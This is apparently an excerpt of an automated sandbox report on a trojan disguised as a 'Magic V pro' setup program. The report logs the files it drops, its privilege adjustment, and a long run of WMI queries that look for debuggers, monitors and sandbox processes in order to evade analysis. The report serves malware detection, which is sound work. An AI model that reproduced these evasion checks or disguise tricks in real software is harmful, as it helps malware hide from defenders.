Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010830E8	10_2_010830E8
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0104B272	10_2_0104B272
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0108B490	10_2_0108B490
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0108F640	10_2_0108F640
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010978C0	10_2_010978C0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01077B30	10_2_01077B30
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01083A20	10_2_01083A20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01087AE0	10_2_01087AE0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01083D40	10_2_01083D40
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0107FCA9	10_2_0107FCA9
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01093F70	10_2_01093F70
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0101FF7C	10_2_0101FF7C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040BA10	17_2_0040BA10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00447FB0	17_2_00447FB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00401040	17_2_00401040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446040	17_2_00446040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041A855	17_2_0041A855
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446810	17_2_00446810
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00410020	17_2_00410020
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00432830	17_2_00432830
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004328D0	17_2_004328D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004298F0	17_2_004298F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004388A0	17_2_004388A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004400A0	17_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042F156	17_2_0042F156
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00436162	17_2_00436162
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446170	17_2_00446170
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00443100	17_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043290E	17_2_0043290E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00444115	17_2_00444115
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00413913	17_2_00413913
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043291D	17_2_0043291D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004089D0	17_2_004089D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004349E0	17_2_004349E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00410990	17_2_00410990
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040A1A0	17_2_0040A1A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004201AB	17_2_004201AB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004381BB	17_2_004381BB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040CA40	17_2_0040CA40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043AA40	17_2_0043AA40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00447250	17_2_00447250
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00445A52	17_2_00445A52
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00421260	17_2_00421260
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00429210	17_2_00429210
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446230	17_2_00446230
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00433ADD	17_2_00433ADD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042C2E0	17_2_0042C2E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446AE0	17_2_00446AE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004462F0	17_2_004462F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00440A80	17_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00402AB0	17_2_00402AB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00421AB0	17_2_00421AB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041535E	17_2_0041535E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040E360	17_2_0040E360
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040EB00	17_2_0040EB00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041CB11	17_2_0041CB11
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043EB10	17_2_0043EB10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043F320	17_2_0043F320
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043C338	17_2_0043C338
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004093C0	17_2_004093C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004503DE	17_2_004503DE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004403E0	17_2_004403E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004363F8	17_2_004363F8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00426380	17_2_00426380
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00433396	17_2_00433396
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041ABA1	17_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00429BA0	17_2_00429BA0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041FBB0	17_2_0041FBB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042C3BD	17_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00438C40	17_2_00438C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00424C60	17_2_00424C60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004034C0	17_2_004034C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00437CC1	17_2_00437CC1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00407CF0	17_2_00407CF0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043ACF0	17_2_0043ACF0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042D48E	17_2_0042D48E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041B4A4	17_2_0041B4A4
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043D4B2	17_2_0043D4B2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00429D50	17_2_00429D50
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043ED70	17_2_0043ED70
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00421D10	17_2_00421D10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042CD16	17_2_0042CD16
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00429D2E	17_2_00429D2E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00419D3C	17_2_00419D3C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004475C0	17_2_004475C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043DD8B	17_2_0043DD8B
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041DD90	17_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0040C5A0	17_2_0040C5A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004215A0	17_2_004215A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004235B0	17_2_004235B0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00408E40	17_2_00408E40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043F640	17_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041C65D	17_2_0041C65D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00403E60	17_2_00403E60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00415E70	17_2_00415E70
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00435E03	17_2_00435E03
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00431600	17_2_00431600
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00411605	17_2_00411605
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004336C2	17_2_004336C2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00431ED0	17_2_00431ED0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0043C6D0	17_2_0043C6D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00446EE0	17_2_00446EE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00439EF4	17_2_00439EF4
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00425E80	17_2_00425E80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004206A0	17_2_004206A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041BF43	17_2_0041BF43
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00427F6B	17_2_00427F6B
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00420F00	17_2_00420F00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042BF10	17_2_0042BF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00442710	17_2_00442710
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00443F22	17_2_00443F22
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0042B7C8	17_2_0042B7C8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00418FD7	17_2_00418FD7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_004127E0	17_2_004127E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00411FF7	17_2_00411FF7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0041B7A5	17_2_0041B7A5
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_004503DE	22_2_004503DE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB7E00	22_2_03FB7E00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FCD729	22_2_03FCD729
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FC1AC0	22_2_03FC1AC0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FBF670	22_2_03FBF670
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FC1150	22_2_03FC1150

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95

Enables security privileges

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: String function: 00418F30 appears 102 times
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: String function: 0040B190 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: String function: 010950F0 appears 743 times
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: String function: 00FF1DFC appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: String function: 00FF1E30 appears 159 times
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: String function: 00FF2A44 appears 47 times

PE file contains executable resources (Code or Archives)

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Sample file is different than original file name gathered from version info

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.0000000002308000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000000.1184924740.00000000004B8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002268000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Binary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Uses 32bit PE files

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: willrandom.exe.10.dr

Static PE information: Section: pb ZLIB complexity 1.021484375

Source: classification engine

Classification label: mal64.troj.evad.winEXE@23/12@4/4

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0100458B __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_0100458B
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_00FF9749 _fileno,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		10_2_00FF9749

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF96A5 DeviceIoControl,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,

10_2_00FF96A5

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 17_2_004349E0 CoCreateInstance,

17_2_004349E0

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

File created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="systeminformer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq64.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="filemon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="tcpview.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="processhacker.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxserver.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cain.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wsbroker.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x32dbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="shade.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="xenservice.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="lordpe.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="proc_analyzer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="bitbox.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autoruns.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="apimonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="regmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ollydbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x64dbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="hookexplorer.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="dumpcap.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="fiddler.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="windbg.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ida.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procexp.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysmon.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpanalyzerstdv7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wireshark.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netstat.exe"
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="docker.exe"
